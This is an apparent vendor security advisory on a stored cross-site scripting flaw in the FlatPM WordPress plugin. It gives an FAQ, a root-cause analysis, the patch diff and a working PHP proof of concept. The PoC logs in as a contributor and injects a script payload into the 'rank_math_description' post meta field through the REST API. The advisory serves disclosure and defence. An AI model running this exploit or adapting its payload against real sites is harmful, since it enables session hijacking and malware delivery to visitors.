What is CVE-2026-0690?

CVE-2026-0690 is a stored cross-site scripting (XSS) vulnerability in the FlatPM – Ad Manager, AdSense and Custom Code plugin for WordPress. It affects versions up to and including 3.2.2, allowing authenticated users with contributor-level access or higher to inject malicious scripts via the ‘rank_math_description’ custom field.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s shortcode function. Authenticated attackers can inject JavaScript payloads into the ‘rank_math_description’ field, which are then executed in the browsers of users who view the affected pages.

Who is affected by this vulnerability?

Any WordPress site using the FlatPM plugin version 3.2.2 or earlier is vulnerable. Specifically, users with contributor-level access or higher can exploit this issue, potentially affecting all visitors to the site.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the FlatPM plugin installed. If it is version 3.2.2 or earlier, your site is at risk. Additionally, review any custom post meta fields for suspicious entries.

How can I fix this vulnerability?

The vulnerability is fixed in version 3.2.3 of the FlatPM plugin. Update the plugin to the latest version immediately to mitigate the risk. Regularly monitor your plugins for updates to ensure ongoing security.

What does the CVSS score of 6.4 indicate?

The CVSS score of 6.4 indicates a medium severity vulnerability that requires authentication to exploit. While it is not the highest severity, the potential impact of stored XSS can be significant, affecting all users who visit the compromised pages.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, unauthorized actions performed on behalf of users, defacement of the site, or distribution of malware. The stored nature of the XSS means that the malicious payload persists until removed.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided demonstrates how an authenticated attacker can log in to a vulnerable WordPress site and inject a JavaScript payload into the ‘rank_math_description’ field. It illustrates the steps to exploit the vulnerability using cURL to simulate the attack.

What should I do if my site has been compromised?

If your site has been compromised, immediately remove the malicious scripts and update the FlatPM plugin to the patched version. Conduct a thorough security audit to identify any additional vulnerabilities and consider restoring from a clean backup.

Are there any additional security measures I should take?

In addition to updating the plugin, implement security best practices such as using a web application firewall, conducting regular security scans, and limiting user permissions to the minimum necessary for their roles.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, keep all WordPress plugins and themes updated, regularly review user permissions, and use security plugins that monitor for suspicious activity. Educate your team on secure coding practices if developing custom plugins.

Where can I find more information about this vulnerability?

More information about CVE-2026-0690 can be found on the official CVE database and security advisories from the WordPress community. Additionally, security blogs and forums often discuss vulnerabilities and mitigation strategies.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0690: FlatPM – Ad Manager, AdSense and Custom Code <= 3.2.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Post Meta (flatpm-wp)

CVE ID CVE-2026-0690

Plugin flatpm-wp

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.2.2

Patched Version 3.2.3

Disclosed January 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0690:
The FlatPM WordPress plugin prior to version 3.2.3 contains an authenticated stored cross-site scripting (XSS) vulnerability. The vulnerability exists within the plugin’s shortcode function for retrieving SEO meta descriptions. Attackers with contributor-level or higher permissions can inject malicious scripts that execute when a user views an affected page. The CVSS score of 6.4 reflects the need for authentication but the broad impact of stored XSS.

Atomic Edge research identifies the root cause as insufficient output escaping in the `flat_pm_shortcode_description()` function within `/flatpm-wp/path/functions/flat-shortcode.php`. The vulnerable function retrieves custom post meta values, including the `rank_math_description` field, and returns them without sanitization. The function directly returns the `$output` variable containing unsanitized user-controlled meta values. The code diff shows the vulnerable function from lines 67-103 in the original file.

The exploitation method requires an authenticated attacker with at least contributor-level access to WordPress. The attacker creates or edits a post and injects a malicious JavaScript payload into the `rank_math_description` custom field via the post meta API. This could be achieved through the WordPress REST API (`/wp-json/wp/v2/posts`) or via direct database manipulation plugins. When the FlatPM shortcode renders the description on the front-end, the unsanitized payload executes in the victim’s browser.

The patch in version 3.2.3 adds a call to `sanitize_text_field()` on the final `$output` before returning it. The diff shows the addition of this sanitization function on line 104. The patch also restructures the code to use a loop for meta key checking and adds type casting for the post ID. These changes ensure all meta values retrieved by the function, regardless of which SEO plugin provides them, are sanitized before output.

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the compromised page. This can lead to session hijacking, administrative actions performed on behalf of users, defacement, or malware distribution. The stored nature means the payload persists and affects all visitors until removed.

Differential between vulnerable and patched code

Code Diff

--- a/flatpm-wp/flat_pm.php
+++ b/flatpm-wp/flat_pm.php
@@ -3,7 +3,7 @@
 Plugin Name: FlatPM – Ad Manager, AdSense and Custom Code
 Plugin URI: https://mehanoid.pro/flat-pm/
 Description: Plugin for displaying ads and interactive content. Popups, GEO, referer, browser, OS, ISP, UTM, A/B tests and more <a href="https://t.me/joinchat/+peZspodMlelhZjIy">Our telegram channel</a>
-Version: 3.2.2
+Version: 3.2.3
 Author: Mehanoid.pro
 Author URI: https://mehanoid.pro/
 Text Domain: flatpm_l10n
@@ -16,7 +16,7 @@


 define( 'FLATPM_SLUG', dirname( plugin_basename( __FILE__ ) ) );
-define( 'FLATPM_VERSION', '?3.2.2' );
+define( 'FLATPM_VERSION', '?3.2.3' );
 define( 'FLATPM_INT_MAX', PHP_INT_MAX - 100 );
 define( 'FLATPM_URL', plugin_dir_url( __FILE__ ) );
 define( 'FLATPM_DIR', __DIR__ );
--- a/flatpm-wp/path/functions/flat-shortcode.php
+++ b/flatpm-wp/path/functions/flat-shortcode.php
@@ -67,34 +67,41 @@
 	}
 }

-if( !function_exists( 'flat_pm_shortcode_description' ) ){
+if( ! function_exists( 'flat_pm_shortcode_description' ) ){
 	function flat_pm_shortcode_description(){
 		$output = '';
+
 		if( is_singular() ){
-			$id = get_queried_object()->ID;
-			$_aioseop_title = get_post_meta( $id, '_aioseop_title', true );
-			$_yoast_wpseo_metadesc = get_post_meta( $id, '_yoast_wpseo_metadesc', true );
-			$rank_math_description = get_post_meta( $id, 'rank_math_description', true );
+			$object = get_queried_object();

-			if( $_aioseop_title ){
-				$output = $_aioseop_title;
+			if( empty( $object->ID ) ){
+				return '';
 			}

-			if( $_yoast_wpseo_metadesc ){
-				$output = $_yoast_wpseo_metadesc;
-			}
+			$post_id = (int) $object->ID;
+
+			$meta_keys = array(
+				'_aioseop_title',
+				'_yoast_wpseo_metadesc',
+				'rank_math_description',
+			);

-			if( $rank_math_description ){
-				$output = $rank_math_description;
+			foreach( $meta_keys as $meta_key ){
+				$meta_value = get_post_meta( $post_id, $meta_key, true );
+
+				if( ! empty( $meta_value ) ){
+					$output = $meta_value;
+					break;
+				}
 			}
 		}else{
-			$id = get_queried_object()->term_id;
 			if( class_exists( 'WPSEO_Frontend' ) ){
-				$wpseo_object = WPSEO_Frontend::get_instance();
-				$output = sanitize_text_field( $wpseo_object->metadesc( false ) );
+				$wpseo = WPSEO_Frontend::get_instance();
+				$output = $wpseo->metadesc( false );
 			}
 		}
-		return $output;
+
+		return sanitize_text_field( $output );
 	}
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0690 - FlatPM – Ad Manager, Adsense and Custom Code <= 3.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Post Meta

<?php

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Payload to inject into the rank_math_description post meta
$xss_payload = '<script>alert("Atomic Edge XSS Test");</script>';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);

// Check if login was successful by looking for dashboard elements
if (strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Create a new post via REST API to get a post ID
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(array(
    'title' => 'Atomic Edge XSS Test Post',
    'status' => 'draft',
    'content' => 'Post content for testing.',
)));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Accept: application/json'
));

$response = curl_exec($ch);
$post_data = json_decode($response, true);

if (!isset($post_data['id'])) {
    die('Failed to create post.');
}

$post_id = $post_data['id'];

// Update the post meta with the malicious rank_math_description value
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-json/wp/v2/posts/' . $post_id);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(array(
    'meta' => array(
        'rank_math_description' => $xss_payload
    )
)));

$response = curl_exec($ch);
$update_data = json_decode($response, true);

if (isset($update_data['meta']['rank_math_description'])) {
    echo 'Payload injected successfully into post ID: ' . $post_id . "n";
    echo 'Visit the post to trigger the XSS: ' . $target_url . '/?p=' . $post_id . "n";
} else {
    echo 'Payload injection may have failed. Response: ' . $response . "n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-0690?
Overview of the vulnerability
CVE-2026-0690 is a stored cross-site scripting (XSS) vulnerability in the FlatPM – Ad Manager, AdSense and Custom Code plugin for WordPress. It affects versions up to and including 3.2.2, allowing authenticated users with contributor-level access or higher to inject malicious scripts via the ‘rank_math_description’ custom field.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s shortcode function. Authenticated attackers can inject JavaScript payloads into the ‘rank_math_description’ field, which are then executed in the browsers of users who view the affected pages.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the FlatPM plugin version 3.2.2 or earlier is vulnerable. Specifically, users with contributor-level access or higher can exploit this issue, potentially affecting all visitors to the site.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the FlatPM plugin installed. If it is version 3.2.2 or earlier, your site is at risk. Additionally, review any custom post meta fields for suspicious entries.
How can I fix this vulnerability?
Mitigation steps
The vulnerability is fixed in version 3.2.3 of the FlatPM plugin. Update the plugin to the latest version immediately to mitigate the risk. Regularly monitor your plugins for updates to ensure ongoing security.
What does the CVSS score of 6.4 indicate?
Understanding the severity rating
The CVSS score of 6.4 indicates a medium severity vulnerability that requires authentication to exploit. While it is not the highest severity, the potential impact of stored XSS can be significant, affecting all users who visit the compromised pages.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to session hijacking, unauthorized actions performed on behalf of users, defacement of the site, or distribution of malware. The stored nature of the XSS means that the malicious payload persists until removed.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploit
The proof of concept provided demonstrates how an authenticated attacker can log in to a vulnerable WordPress site and inject a JavaScript payload into the ‘rank_math_description’ field. It illustrates the steps to exploit the vulnerability using cURL to simulate the attack.
What should I do if my site has been compromised?
Response to exploitation
If your site has been compromised, immediately remove the malicious scripts and update the FlatPM plugin to the patched version. Conduct a thorough security audit to identify any additional vulnerabilities and consider restoring from a clean backup.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, implement security best practices such as using a web application firewall, conducting regular security scans, and limiting user permissions to the minimum necessary for their roles.
How can I prevent similar vulnerabilities in the future?
Long-term security strategies
To prevent similar vulnerabilities, keep all WordPress plugins and themes updated, regularly review user permissions, and use security plugins that monitor for suspicious activity. Educate your team on secure coding practices if developing custom plugins.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-0690 can be found on the official CVE database and security advisories from the WordPress community. Additionally, security blogs and forums often discuss vulnerabilities and mitigation strategies.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations